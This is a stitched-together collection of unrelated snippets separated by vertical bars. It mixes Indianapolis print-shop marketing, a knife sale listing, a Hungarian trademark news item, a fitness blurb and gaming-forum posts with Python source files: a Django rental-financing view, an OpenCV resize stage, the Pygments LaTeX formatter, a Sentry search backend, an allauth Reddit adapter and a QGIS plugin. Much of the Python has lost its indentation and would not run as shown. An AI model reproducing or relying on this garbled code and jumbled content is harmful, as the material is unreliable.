We encourage you to take advantage of our skilled marketing and design team. Elite Printing offers innovative solutions for developing your business. Our marketing and design consultants can set your company up with an effective marketing plan, custom graphic design, and fast turnaround with exceptional quality. We can also provide suggestions for green, environmentally friendly printing. Let us help you grow your business.
Elite Printing is centrally located in SoBro to better serve Downtown and the Northside of Greater Indianapolis. Hobby Copy is conveniently located in the University of Indianapolis neighborhood. The addition of Hobby Copy has allowed our company to serve both the north and south sides of Indianapolis.
Hobby Copy is known for its specialization in high-speed copies and quick turnaround. In association with Elite Printing, our goal is to provide our customers with expanded services from both locations. We offer pickup and delivery from either location, giving you the experience of one-stop shopping.
|
##############################################################################
#
# Immobilier it's an application
# designed to manage the core business of property management, buildings,
# rental agreement and so on.
#
# Copyright (C) 2016-2018 Verpoorten Leïla
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
#
##############################################################################
from django.shortcuts import render, redirect
from datetime import datetime
from main import models as mdl
from dateutil.relativedelta import relativedelta
def new(request, location_id):
location = mdl.contrat_location.find_by_id(location_id)
    # Find the most recent financing record
financement_list = mdl.financement_location.find_by_location(location_id).order_by('date_debut')
financement_dernier = financement_list.last()
nouveau_financement = None
financement = None
if financement_list:
financement = financement_list[0]
        # duplicate it
nouveau_financement = mdl.financement_location.FinancementLocation()
nouveau_financement.date_debut = financement_dernier.date_debut
nouveau_financement.date_fin = financement_dernier.date_fin
nouveau_financement.loyer = financement_dernier.loyer
nouveau_financement.charges = financement_dernier.charges
nouveau_financement.index = financement_dernier.index
return render(request, "financementlocation_new.html",
{'old_financement': financement,
'nouveau_financement': nouveau_financement,
'id_location': location.id,
'prev': request.GET.get('prev', None),
'previous': 'location'})
def create(request):
    location = mdl.contrat_location.find_by_id(request.POST['id'])
    previous = request.POST.get('previous', None)
    prev = request.POST.get('prev', None)
    if request.POST.get('cancel_financement_loc_new', None):
        if previous == 'location':
            return render(request, "contratlocation_update.html",
                          {'location': location})
    else:
        # TODO: retrieve the new financing, adjust the old one, and save everything to the database
        # adjust the current financing record
financement_courant = location.dernier_financement
financement_list = mdl.financement_location.find_by_location(location.id).order_by('date_debut')
financement_dernier = financement_list.last()
date_fin_initiale = location.date_fin
nouvelle_date_fin_financement_courant = modifer_date_fin_financement_courant(financement_courant, request)
nouveau_financement = nouveau_financement_depuis_precedant(date_fin_initiale, location,
nouvelle_date_fin_financement_courant, request)
        # existing follow-up records must also be updated
suivis_existant = mdl.suivi_loyer.find(financement_courant, nouveau_financement.date_debut, 'A_VERIFIER')
for s in suivis_existant:
s.financement_location = nouveau_financement
s.remarque = 'Indexé'
s.save()
financement_courant = mdl.financement_location.find_by_id(location.financement_courant.id)
if prev == 'fl' or previous == 'location':
return render(request, "contratlocation_update.html",
{'location': location})
return redirect('/contratlocations/')
def nouveau_financement_depuis_precedant(date_fin_initiale, location, nouvelle_date_fin_financement_courant, request):
    # create the new financing record
nouveau_financement = mdl.financement_location.FinancementLocation()
nouveau_financement.date_debut = nouvelle_date_fin_financement_courant + relativedelta(days=1)
    nouveau_financement.date_fin = date_fin_initiale  # assume the end date does not change
nouveau_financement.loyer = 0
if request.POST.get('loyer', None):
nouveau_financement.loyer = float(request.POST['loyer'].replace(',', '.'))
nouveau_financement.charges = 0
if request.POST.get('charges', None):
nouveau_financement.charges = float(request.POST['charges'].replace(',', '.'))
nouveau_financement.index = 0
if request.POST.get('index', None):
nouveau_financement.index = float(request.POST['index'].replace(',', '.'))
nouveau_financement.contrat_location = location
nouveau_financement.save()
return nouveau_financement
def modifer_date_fin_financement_courant(financement_courant, request):
nouvelle_date_de_fin = None
if request.POST['date_debut']:
nouvelle_date_de_fin = datetime.strptime(request.POST['date_debut'], '%d/%m/%Y')
nouvelle_date_de_fin = nouvelle_date_de_fin - relativedelta(days=1)
financement_courant.date_fin = nouvelle_date_de_fin
financement_courant.save()
return nouvelle_date_de_fin
|
Description: Here we have a vintage hunting knife with scrimshaw of an Indian chief totem pole. The blade is hollow ground with a mirror-polish finish and is hair-shaving sharp. The handle is polished stag with scrimshaw by Pike, 4-02 and #46. Full-tang construction with black liners. Excellent fit and finish. This knife has never been used and is in mint condition. The leather sheath is missing the front snap; you can send the sheath to Green River Leather Works, and it will cost about $5.00 to fix.
|
"""An image processing pipeline stage which resizes images.
Using this pipe negates the need for setting resolution directly on the camera,
while still allowing for tuning of the received images. If you encounter a
problem with "Inappropriate IOCTL for device", you might consider using the
default camera resolution and resizing images as needed afterwards."""
import cv
__author__ = "Nick Pascucci (npascut1@gmail.com)"
class ResizePipe:
def __init__(self, next_pipe, x_res=640, y_res=480):
self.next_pipe = next_pipe
self.x_res = x_res
self.y_res = y_res
def process(self, image):
if image.width == self.x_res and image.height == self.y_res:
return image
# Resizing tries to fit the original image into the new destination
# image exactly, so if they don't scale well to each other there may be
# distortion.
if ((image.width % self.x_res != 0 and self.x_res % image.width != 0) or
(image.height % self.y_res != 0 and self.y_res % image.height != 0)):
            print ("WARNING: Resize target size does not fit cleanly into "
                   "original. Distortion of the image may occur.")
print "\tOriginal size: %sx%s" % (image.width, image.height)
print "\tTarget size: %sx%s" % (self.x_res, self.y_res)
# We first create a destination image of the proper size,
# and then call resize() with it to resize the image.
# cv.CreateMat is kind of weird since it takes rows then columns as
# arguments rather than the usual (x, y) ordering.
if type(image) == cv.iplimage:
resized_image = cv.CreateImage((self.x_res, self.y_res),
image.depth, image.nChannels)
else:
resized_image = cv.CreateMat(self.y_res, self.x_res, image.type)
cv.Resize(image, resized_image)
if self.next_pipe:
processed_image = self.next_pipe.process(resized_image)
return processed_image
else:
return resized_image
|
# -*- coding: utf-8 -*-
"""
pygments.formatters.latex
~~~~~~~~~~~~~~~~~~~~~~~~~
Formatter for LaTeX fancyvrb output.
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from __future__ import division
from pygments.formatter import Formatter
from pygments.lexer import Lexer
from pygments.token import Token, STANDARD_TYPES
from pygments.util import get_bool_opt, get_int_opt, StringIO, xrange, \
iteritems
__all__ = ['LatexFormatter']
def escape_tex(text, commandprefix):
return text.replace('\\', '\x00'). \
replace('{', '\x01'). \
replace('}', '\x02'). \
replace('\x00', r'\%sZbs{}' % commandprefix). \
replace('\x01', r'\%sZob{}' % commandprefix). \
replace('\x02', r'\%sZcb{}' % commandprefix). \
replace('^', r'\%sZca{}' % commandprefix). \
replace('_', r'\%sZus{}' % commandprefix). \
replace('&', r'\%sZam{}' % commandprefix). \
replace('<', r'\%sZlt{}' % commandprefix). \
replace('>', r'\%sZgt{}' % commandprefix). \
replace('#', r'\%sZsh{}' % commandprefix). \
replace('%', r'\%sZpc{}' % commandprefix). \
replace('$', r'\%sZdl{}' % commandprefix). \
replace('-', r'\%sZhy{}' % commandprefix). \
replace("'", r'\%sZsq{}' % commandprefix). \
replace('"', r'\%sZdq{}' % commandprefix). \
replace('~', r'\%sZti{}' % commandprefix)
DOC_TEMPLATE = r'''
\documentclass{%(docclass)s}
\usepackage{fancyvrb}
\usepackage{color}
\usepackage[%(encoding)s]{inputenc}
%(preamble)s
%(styledefs)s
\begin{document}
\section*{%(title)s}
%(code)s
\end{document}
'''
## Small explanation of the mess below :)
#
# The previous version of the LaTeX formatter just assigned a command to
# each token type defined in the current style. That obviously is
# problematic if the highlighted code is produced for a different style
# than the style commands themselves.
#
# This version works much like the HTML formatter which assigns multiple
# CSS classes to each <span> tag, from the most specific to the least
# specific token type, thus falling back to the parent token type if one
# is not defined. Here, the classes are there too and use the same short
# forms given in token.STANDARD_TYPES.
#
# Highlighted code now only uses one custom command, which by default is
# \PY and selectable by the commandprefix option (and in addition the
# escapes \PYZat, \PYZlb and \PYZrb which haven't been renamed for
# backwards compatibility purposes).
#
# \PY has two arguments: the classes, separated by +, and the text to
# render in that style. The classes are resolved into the respective
# style commands by magic, which serves to ignore unknown classes.
#
# The magic macros are:
# * \PY@it, \PY@bf, etc. are unconditionally wrapped around the text
# to render in \PY@do. Their definition determines the style.
# * \PY@reset resets \PY@it etc. to do nothing.
# * \PY@toks parses the list of classes, using magic inspired by the
# keyval package (but modified to use plusses instead of commas
# because fancyvrb redefines commas inside its environments).
# * \PY@tok processes one class, calling the \PY@tok@classname command
# if it exists.
# * \PY@tok@classname sets the \PY@it etc. to reflect the chosen style
# for its class.
# * \PY resets the style, parses the classnames and then calls \PY@do.
#
# Tip: to read this code, print it out in substituted form using e.g.
# >>> print(STYLE_TEMPLATE % {'cp': 'PY'})
STYLE_TEMPLATE = r'''
\makeatletter
\def\%(cp)s@reset{\let\%(cp)s@it=\relax \let\%(cp)s@bf=\relax%%
\let\%(cp)s@ul=\relax \let\%(cp)s@tc=\relax%%
\let\%(cp)s@bc=\relax \let\%(cp)s@ff=\relax}
\def\%(cp)s@tok#1{\csname %(cp)s@tok@#1\endcsname}
\def\%(cp)s@toks#1+{\ifx\relax#1\empty\else%%
\%(cp)s@tok{#1}\expandafter\%(cp)s@toks\fi}
\def\%(cp)s@do#1{\%(cp)s@bc{\%(cp)s@tc{\%(cp)s@ul{%%
\%(cp)s@it{\%(cp)s@bf{\%(cp)s@ff{#1}}}}}}}
\def\%(cp)s#1#2{\%(cp)s@reset\%(cp)s@toks#1+\relax+\%(cp)s@do{#2}}
%(styles)s
\def\%(cp)sZbs{\char`\\}
\def\%(cp)sZus{\char`\_}
\def\%(cp)sZob{\char`\{}
\def\%(cp)sZcb{\char`\}}
\def\%(cp)sZca{\char`\^}
\def\%(cp)sZam{\char`\&}
\def\%(cp)sZlt{\char`\<}
\def\%(cp)sZgt{\char`\>}
\def\%(cp)sZsh{\char`\#}
\def\%(cp)sZpc{\char`\%%}
\def\%(cp)sZdl{\char`\$}
\def\%(cp)sZhy{\char`\-}
\def\%(cp)sZsq{\char`\'}
\def\%(cp)sZdq{\char`\"}
\def\%(cp)sZti{\char`\~}
%% for compatibility with earlier versions
\def\%(cp)sZat{@}
\def\%(cp)sZlb{[}
\def\%(cp)sZrb{]}
\makeatother
'''
def _get_ttype_name(ttype):
fname = STANDARD_TYPES.get(ttype)
if fname:
return fname
aname = ''
while fname is None:
aname = ttype[-1] + aname
ttype = ttype.parent
fname = STANDARD_TYPES.get(ttype)
return fname + aname
class LatexFormatter(Formatter):
r"""
Format tokens as LaTeX code. This needs the `fancyvrb` and `color`
standard packages.
Without the `full` option, code is formatted as one ``Verbatim``
environment, like this:
.. sourcecode:: latex
\begin{Verbatim}[commandchars=\\\{\}]
\PY{k}{def }\PY{n+nf}{foo}(\PY{n}{bar}):
\PY{k}{pass}
\end{Verbatim}
The special command used here (``\PY``) and all the other macros it needs
are output by the `get_style_defs` method.
With the `full` option, a complete LaTeX document is output, including
the command definitions in the preamble.
The `get_style_defs()` method of a `LatexFormatter` returns a string
containing ``\def`` commands defining the macros needed inside the
``Verbatim`` environments.
Additional options accepted:
`style`
The style to use, can be a string or a Style subclass (default:
``'default'``).
`full`
Tells the formatter to output a "full" document, i.e. a complete
self-contained document (default: ``False``).
`title`
If `full` is true, the title that should be used to caption the
document (default: ``''``).
`docclass`
If the `full` option is enabled, this is the document class to use
(default: ``'article'``).
`preamble`
If the `full` option is enabled, this can be further preamble commands,
e.g. ``\usepackage`` (default: ``''``).
`linenos`
If set to ``True``, output line numbers (default: ``False``).
`linenostart`
The line number for the first line (default: ``1``).
`linenostep`
If set to a number n > 1, only every nth line number is printed.
`verboptions`
Additional options given to the Verbatim environment (see the *fancyvrb*
docs for possible values) (default: ``''``).
`commandprefix`
The LaTeX commands used to produce colored output are constructed
using this prefix and some letters (default: ``'PY'``).
.. versionadded:: 0.7
.. versionchanged:: 0.10
The default is now ``'PY'`` instead of ``'C'``.
`texcomments`
        If set to ``True``, enables LaTeX comment lines. That is, LaTeX markup
in comment tokens is not escaped so that LaTeX can render it (default:
``False``).
.. versionadded:: 1.2
`mathescape`
If set to ``True``, enables LaTeX math mode escape in comments. That
is, ``'$...$'`` inside a comment will trigger math mode (default:
``False``).
.. versionadded:: 1.2
`escapeinside`
If set to a string of length 2, enables escaping to LaTeX. Text
delimited by these 2 characters is read as LaTeX code and
typeset accordingly. It has no effect in string literals. It has
no effect in comments if `texcomments` or `mathescape` is
set. (default: ``''``).
.. versionadded:: 2.0
"""
name = 'LaTeX'
aliases = ['latex', 'tex']
filenames = ['*.tex']
def __init__(self, **options):
Formatter.__init__(self, **options)
self.docclass = options.get('docclass', 'article')
self.preamble = options.get('preamble', '')
self.linenos = get_bool_opt(options, 'linenos', False)
self.linenostart = abs(get_int_opt(options, 'linenostart', 1))
self.linenostep = abs(get_int_opt(options, 'linenostep', 1))
self.verboptions = options.get('verboptions', '')
self.nobackground = get_bool_opt(options, 'nobackground', False)
self.commandprefix = options.get('commandprefix', 'PY')
self.texcomments = get_bool_opt(options, 'texcomments', False)
self.mathescape = get_bool_opt(options, 'mathescape', False)
self.escapeinside = options.get('escapeinside', '')
if len(self.escapeinside) == 2:
self.left = self.escapeinside[0]
self.right = self.escapeinside[1]
else:
self.escapeinside = ''
self._create_stylesheet()
def _create_stylesheet(self):
t2n = self.ttype2name = {Token: ''}
c2d = self.cmd2def = {}
cp = self.commandprefix
def rgbcolor(col):
if col:
                return ','.join(['%.2f' % (int(col[i] + col[i + 1], 16) / 255.0)
                                 for i in (0, 2, 4)])
else:
return '1,1,1'
for ttype, ndef in self.style:
name = _get_ttype_name(ttype)
cmndef = ''
if ndef['bold']:
cmndef += r'\let\$$@bf=\textbf'
if ndef['italic']:
cmndef += r'\let\$$@it=\textit'
if ndef['underline']:
cmndef += r'\let\$$@ul=\underline'
if ndef['roman']:
cmndef += r'\let\$$@ff=\textrm'
if ndef['sans']:
cmndef += r'\let\$$@ff=\textsf'
if ndef['mono']:
cmndef += r'\let\$$@ff=\textsf'
if ndef['color']:
cmndef += (r'\def\$$@tc##1{\textcolor[rgb]{%s}{##1}}' %
rgbcolor(ndef['color']))
if ndef['border']:
cmndef += (r'\def\$$@bc##1{\setlength{\fboxsep}{0pt}'
r'\fcolorbox[rgb]{%s}{%s}{\strut ##1}}' %
(rgbcolor(ndef['border']),
rgbcolor(ndef['bgcolor'])))
elif ndef['bgcolor']:
cmndef += (r'\def\$$@bc##1{\setlength{\fboxsep}{0pt}'
r'\colorbox[rgb]{%s}{\strut ##1}}' %
rgbcolor(ndef['bgcolor']))
if cmndef == '':
continue
cmndef = cmndef.replace('$$', cp)
t2n[ttype] = name
c2d[name] = cmndef
def get_style_defs(self, arg=''):
"""
Return the command sequences needed to define the commands
used to format text in the verbatim environment. ``arg`` is ignored.
"""
cp = self.commandprefix
styles = []
for name, definition in iteritems(self.cmd2def):
styles.append(r'\expandafter\def\csname %s@tok@%s\endcsname{%s}' %
(cp, name, definition))
return STYLE_TEMPLATE % {'cp': self.commandprefix,
'styles': '\n'.join(styles)}
def format_unencoded(self, tokensource, outfile):
# TODO: add support for background colors
t2n = self.ttype2name
cp = self.commandprefix
if self.full:
realoutfile = outfile
outfile = StringIO()
outfile.write(u'\\begin{Verbatim}[commandchars=\\\\\\{\\}')
if self.linenos:
start, step = self.linenostart, self.linenostep
outfile.write(u',numbers=left' +
(start and u',firstnumber=%d' % start or u'') +
(step and u',stepnumber=%d' % step or u''))
if self.mathescape or self.texcomments or self.escapeinside:
outfile.write(u',codes={\\catcode`\\$=3\\catcode`\\^=7\\catcode`\\_=8}')
if self.verboptions:
outfile.write(u',' + self.verboptions)
outfile.write(u']\n')
for ttype, value in tokensource:
if ttype in Token.Comment:
if self.texcomments:
# Try to guess comment starting lexeme and escape it ...
start = value[0:1]
for i in xrange(1, len(value)):
if start[0] != value[i]:
break
start += value[i]
value = value[len(start):]
start = escape_tex(start, self.commandprefix)
# ... but do not escape inside comment.
value = start + value
elif self.mathescape:
# Only escape parts not inside a math environment.
parts = value.split('$')
in_math = False
for i, part in enumerate(parts):
if not in_math:
parts[i] = escape_tex(part, self.commandprefix)
in_math = not in_math
value = '$'.join(parts)
elif self.escapeinside:
text = value
value = ''
while len(text) > 0:
                        a, sep1, text = text.partition(self.left)
                        if len(sep1) > 0:
                            b, sep2, text = text.partition(self.right)
if len(sep2) > 0:
value += escape_tex(a, self.commandprefix) + b
else:
value += escape_tex(a + sep1 + b, self.commandprefix)
else:
value = value + escape_tex(a, self.commandprefix)
else:
value = escape_tex(value, self.commandprefix)
elif ttype not in Token.Escape:
value = escape_tex(value, self.commandprefix)
styles = []
while ttype is not Token:
try:
styles.append(t2n[ttype])
except KeyError:
# not in current style
styles.append(_get_ttype_name(ttype))
ttype = ttype.parent
styleval = '+'.join(reversed(styles))
if styleval:
spl = value.split('\n')
for line in spl[:-1]:
if line:
outfile.write("\\%s{%s}{%s}" % (cp, styleval, line))
outfile.write('\n')
if spl[-1]:
outfile.write("\\%s{%s}{%s}" % (cp, styleval, spl[-1]))
else:
outfile.write(value)
outfile.write(u'\\end{Verbatim}\n')
if self.full:
realoutfile.write(DOC_TEMPLATE %
dict(docclass = self.docclass,
preamble = self.preamble,
title = self.title,
encoding = self.encoding or 'latin1',
styledefs = self.get_style_defs(),
code = outfile.getvalue()))
class LatexEmbeddedLexer(Lexer):
r"""
This lexer takes one lexer as argument, the lexer for the language
being formatted, and the left and right delimiters for escaped text.
First everything is scanned using the language lexer to obtain
strings and comments. All other consecutive tokens are merged and
the resulting text is scanned for escaped segments, which are given
the Token.Escape type. Finally text that is not escaped is scanned
again with the language lexer.
"""
def __init__(self, left, right, lang, **options):
self.left = left
self.right = right
self.lang = lang
Lexer.__init__(self, **options)
def get_tokens_unprocessed(self, text):
buf = ''
for i, t, v in self.lang.get_tokens_unprocessed(text):
if t in Token.Comment or t in Token.String:
if buf:
for x in self.get_tokens_aux(idx, buf):
yield x
buf = ''
yield i, t, v
else:
if not buf:
idx = i
buf += v
if buf:
for x in self.get_tokens_aux(idx, buf):
yield x
def get_tokens_aux(self, index, text):
while text:
a, sep1, text = text.partition(self.left)
if a:
for i, t, v in self.lang.get_tokens_unprocessed(a):
yield index + i, t, v
index += len(a)
if sep1:
b, sep2, text = text.partition(self.right)
if sep2:
yield index + len(sep1), Token.Escape, b
index += len(sep1) + len(b) + len(sep2)
else:
yield index, Token.Error, sep1
index += len(sep1)
text = b
|
The Budapest Court of Appeal has recently upheld the Metropolitan Court's decision establishing that TV2 Zrt., a Hungarian media company owned by Hungarian producer and government film commissioner Andy Vajna, infringed a trademark owned by its competitor, AMC Networks.
In 2016, TV2 launched a cooking channel called Chili TV, and AMC, the owner of the TV Paprika® national and EU trademarks (TV Paprika is the name of AMC's cooking channel), filed a trademark infringement lawsuit.
In the course of the lawsuit, the law firm representing AMC Networks submitted the results of an opinion poll showing that, when asked what they thought chili was, 95% of 1,000 respondents answered "paprika" or described paprika in their own words. The court ruled that there is a likelihood of confusion between the two channel names and ordered TV2 to stop using the word combination Chili TV and the chilitv.tv domain name.
TV2 has already renamed its cooking channel LiChi TV and is in the process of registering this new trademark.
|
"""
sentry.search.django.backend
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
from django.db import router
from django.db.models import Q
from sentry.api.paginator import DateTimePaginator, Paginator
from sentry.search.base import ANY, SearchBackend
from sentry.search.django.constants import (
SORT_CLAUSES, SQLITE_SORT_CLAUSES, MYSQL_SORT_CLAUSES, MSSQL_SORT_CLAUSES,
MSSQL_ENGINES, ORACLE_SORT_CLAUSES
)
from sentry.utils.db import get_db_engine
class DjangoSearchBackend(SearchBackend):
def query(self, project, query=None, status=None, tags=None,
bookmarked_by=None, assigned_to=None, first_release=None,
sort_by='date', unassigned=None,
age_from=None, age_from_inclusive=True,
age_to=None, age_to_inclusive=True,
date_from=None, date_from_inclusive=True,
date_to=None, date_to_inclusive=True,
cursor=None, limit=100):
from sentry.models import Event, Group, GroupStatus
queryset = Group.objects.filter(project=project)
if query:
# TODO(dcramer): if we want to continue to support search on SQL
# we should at least optimize this in Postgres so that it does
# the query filter **after** the index filters, and restricts the
# result set
queryset = queryset.filter(
Q(message__icontains=query) |
Q(culprit__icontains=query)
)
if status is None:
queryset = queryset.exclude(
status__in=(
GroupStatus.PENDING_DELETION,
GroupStatus.DELETION_IN_PROGRESS,
GroupStatus.PENDING_MERGE,
)
)
else:
queryset = queryset.filter(status=status)
if bookmarked_by:
queryset = queryset.filter(
bookmark_set__project=project,
bookmark_set__user=bookmarked_by,
)
if assigned_to:
queryset = queryset.filter(
assignee_set__project=project,
assignee_set__user=assigned_to,
)
elif unassigned in (True, False):
queryset = queryset.filter(
assignee_set__isnull=unassigned,
)
if first_release:
queryset = queryset.filter(
first_release__project=project,
first_release__version=first_release,
)
if tags:
for k, v in tags.iteritems():
if v == ANY:
queryset = queryset.filter(
grouptag__project=project,
grouptag__key=k,
)
else:
queryset = queryset.filter(
grouptag__project=project,
grouptag__key=k,
grouptag__value=v,
)
queryset = queryset.distinct()
if age_from or age_to:
params = {}
if age_from:
if age_from_inclusive:
params['first_seen__gte'] = age_from
else:
params['first_seen__gt'] = age_from
if age_to:
if age_to_inclusive:
params['first_seen__lte'] = age_to
else:
params['first_seen__lt'] = age_to
queryset = queryset.filter(**params)
if date_from or date_to:
params = {
'project_id': project.id,
}
if date_from:
if date_from_inclusive:
params['datetime__gte'] = date_from
else:
params['datetime__gt'] = date_from
if date_to:
if date_to_inclusive:
params['datetime__lte'] = date_to
else:
params['datetime__lt'] = date_to
event_queryset = Event.objects.filter(**params)
# limit to the first 1000 results
group_ids = event_queryset.distinct().values_list(
'group_id',
flat=True
)[:1000]
# if Event is not on the primary database remove Django's
# implicit subquery by coercing to a list
base = router.db_for_read(Group)
using = router.db_for_read(Event)
if base != using:
group_ids = list(group_ids)
queryset = queryset.filter(
id__in=group_ids,
)
engine = get_db_engine('default')
if engine.startswith('sqlite'):
score_clause = SQLITE_SORT_CLAUSES[sort_by]
elif engine.startswith('mysql'):
score_clause = MYSQL_SORT_CLAUSES[sort_by]
elif engine.startswith('oracle'):
score_clause = ORACLE_SORT_CLAUSES[sort_by]
elif engine in MSSQL_ENGINES:
score_clause = MSSQL_SORT_CLAUSES[sort_by]
else:
score_clause = SORT_CLAUSES[sort_by]
if sort_by == 'tottime':
queryset = queryset.filter(time_spent_count__gt=0)
elif sort_by == 'avgtime':
queryset = queryset.filter(time_spent_count__gt=0)
queryset = queryset.extra(
select={'sort_value': score_clause},
)
# HACK: don't sort by the same column twice
if sort_by == 'date':
paginator_cls = DateTimePaginator
sort_clause = '-last_seen'
elif sort_by == 'priority':
paginator_cls = Paginator
sort_clause = '-score'
elif sort_by == 'new':
paginator_cls = DateTimePaginator
sort_clause = '-first_seen'
elif sort_by == 'freq':
paginator_cls = Paginator
sort_clause = '-times_seen'
else:
paginator_cls = Paginator
sort_clause = '-sort_value'
queryset = queryset.order_by(sort_clause)
paginator = paginator_cls(queryset, sort_clause)
return paginator.get_result(limit, cursor)
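The inclusive/exclusive range handling above (for `age_from`/`age_to` and `date_from`/`date_to`) repeats one pattern; a standalone sketch, with a hypothetical helper name, of building those Django-style lookup parameters:

```python
def range_params(field, lo=None, hi=None, lo_incl=True, hi_incl=True):
    """Build Django-style __gt/__gte/__lt/__lte lookups for a range filter."""
    params = {}
    if lo is not None:
        params['%s__%s' % (field, 'gte' if lo_incl else 'gt')] = lo
    if hi is not None:
        params['%s__%s' % (field, 'lte' if hi_incl else 'lt')] = hi
    return params

# e.g. range_params('first_seen', lo=1, hi=9, hi_incl=False)
# -> {'first_seen__gte': 1, 'first_seen__lt': 9}
```

The resulting dict can be splatted into `queryset.filter(**params)` exactly as the code above does.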
|
We reviewed and tried numerous ab routines on YouTube and found four of the best for tightening, toning, and defining the abdominals. For optimal results, do ab routines 2-3 times weekly with rest days between workouts. Consider doing an ab workout on Monday, Wednesday, and Friday of each week. You can also find numerous ab routines right here on Skinny Ms. Check out our most recent workout, the Fabulous Abs in 30 Days Challenge.
Need to burn some fat to uncover those beautiful abs you’ve been working on? Check out 36 Fat Blasters and uncover the abs of your dreams.
Equipment Needed: yoga mat and water for hydration.
|
import requests
from allauth.socialaccount import app_settings
from allauth.socialaccount.providers.oauth2.views import (
OAuth2Adapter,
OAuth2CallbackView,
OAuth2LoginView,
)
from .provider import RedditProvider
class RedditAdapter(OAuth2Adapter):
provider_id = RedditProvider.id
access_token_url = 'https://www.reddit.com/api/v1/access_token'
authorize_url = 'https://www.reddit.com/api/v1/authorize'
profile_url = 'https://oauth.reddit.com/api/v1/me'
basic_auth = True
settings = app_settings.PROVIDERS.get(provider_id, {})
# Allow custom User Agent to comply with reddit API limits
headers = {
'User-Agent': settings.get('USER_AGENT', 'django-allauth-header')}
def complete_login(self, request, app, token, **kwargs):
headers = {
"Authorization": "bearer " + token.token}
headers.update(self.headers)
extra_data = requests.get(self.profile_url, headers=headers)
        # This is only here because of a weird response from the test suite
if isinstance(extra_data, list):
extra_data = extra_data[0]
return self.get_provider().sociallogin_from_response(
request,
extra_data.json()
)
oauth2_login = OAuth2LoginView.adapter_view(RedditAdapter)
oauth2_callback = OAuth2CallbackView.adapter_view(RedditAdapter)
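The `USER_AGENT` lookup above reads from allauth's per-provider settings; a hedged sketch of what that configuration might look like in `settings.py` (the app name and username are placeholders):

```python
# settings.py (sketch): the 'reddit' key is read via app_settings.PROVIDERS
# in the adapter above; the USER_AGENT value here is a placeholder.
SOCIALACCOUNT_PROVIDERS = {
    'reddit': {
        'AUTH_PARAMS': {'duration': 'permanent'},
        'USER_AGENT': 'django:myapp:1.0 (by /u/placeholder)',
    },
}
```

Without an entry here, the adapter falls back to the `'django-allauth-header'` default shown above.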
|
... My yearly profile post incoming!
I see, gg. I also see that the egg-vasion of the Twitter page has begun.
GTX 1080 arrived... but can it run Crysis?
Back from the holiday :-D Time for some updates!
What do you call it when Batman skips church? I guess a.... Christian Bale!
Ha.... Comedy am I right?
Do I hear a vote to make a thread solely on batman jokes? Or is it just me, lol.
@astrotrain24 but what if he does that in the matrix and he thinks he is out but he is really in the matrix 2.0?
Spam spam spam... Nah I'm just kidding.. Thanks for being an amazing server owner... You have shaped me, this community, and everyone into a better person and you truly inspire me to strive to do my best. Thank you... Heil ceteC!
We all love ya' Joker! Don't stop being awesome!
From the Skylord to you, thank you for FIVE YEARS' worth of happiness and memories, new experiences, broadened knowledge, and heightened creativity!!!!! <3 <3 <3 I've always been glad to have called Iciclecraft (and AverageZone) home, and it always will be to me.
tenki for supporting such an awesome community for many people to play on !
Thank you, svenska köttbullar, for having such a great server and for so long!
Back from the skiing holiday!
|
# -*- coding: utf-8 -*-
"""
/***************************************************************************
PolygonsParallelToLine
A QGIS plugin
This plugin rotates polygons parallel to line
-------------------
begin : 2016-03-10
copyright : (C) 2016-2017 by Andrey Lekarev
email : elfpkck@gmail.com
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
__author__ = 'Andrey Lekarev'
__date__ = '2016-03-10'
__copyright__ = '(C) 2016-2017 by Andrey Lekarev'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os.path
from PyQt4.QtGui import QIcon
from processing.core.AlgorithmProvider import AlgorithmProvider
from processing.core.ProcessingConfig import Setting, ProcessingConfig
from pptl_algorithm import PolygonsParallelToLineAlgorithm
class PolygonsParallelToLineProvider(AlgorithmProvider):
MY_SETTING = 'MY_SETTING'
def __init__(self):
AlgorithmProvider.__init__(self)
# Deactivate provider by default
self.activate = False
# Load algorithms
self.alglist = [PolygonsParallelToLineAlgorithm()]
for alg in self.alglist:
alg.provider = self
def initializeSettings(self):
"""In this method we add settings needed to configure our
provider.
"""
AlgorithmProvider.initializeSettings(self)
ProcessingConfig.addSetting(Setting('Example algorithms',
PolygonsParallelToLineProvider.MY_SETTING,
'Example setting', 'Default value'))
def unload(self):
"""Setting should be removed here, so they do not appear anymore
when the plugin is unloaded.
"""
AlgorithmProvider.unload(self)
ProcessingConfig.removeSetting(
PolygonsParallelToLineProvider.MY_SETTING)
def getName(self):
"""This is the name that will appear on the toolbox group.
It is also used to create the command line name of all the
algorithms from this provider.
"""
return 'Polygons parallel to line'
def getDescription(self):
"""This is the provired full name.
"""
return 'Polygons parallel to line'
def getIcon(self):
"""We return the default icon.
"""
# return AlgorithmProvider.getIcon(self)
path = os.path.join(os.path.dirname(__file__), "icons", "icon.png")
return QIcon(path)
def _loadAlgorithms(self):
"""Here we fill the list of algorithms in self.algs.
This method is called whenever the list of algorithms should
be updated. If the list of algorithms can change (for instance,
if it contains algorithms from user-defined scripts and a new
script might have been added), you should create the list again
here.
In this case, since the list is always the same, we assign from
the pre-made list. This assignment has to be done in this method
even if the list does not change, since the self.algs list is
cleared before calling this method.
"""
self.algs = self.alglist
|
